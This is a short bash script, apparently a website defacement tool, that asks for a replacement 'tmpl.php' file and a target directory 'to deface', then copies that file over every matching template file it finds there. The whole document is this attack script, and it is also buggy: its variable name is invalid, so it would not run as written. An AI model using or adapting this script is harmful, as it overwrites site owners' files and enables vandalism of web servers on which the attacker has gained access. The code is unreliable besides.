#!/bin/bash
echo '[+] your tmpl.php path on the server'
read tmpl.php 
echo
echo '[+] enter the path To deface '
read path
echo
echo '[+] Starting ........'
find $path -name "tmpl.php.*" -exec cp $tmpl.php {} \;
echo 
echo '[+] Done !'
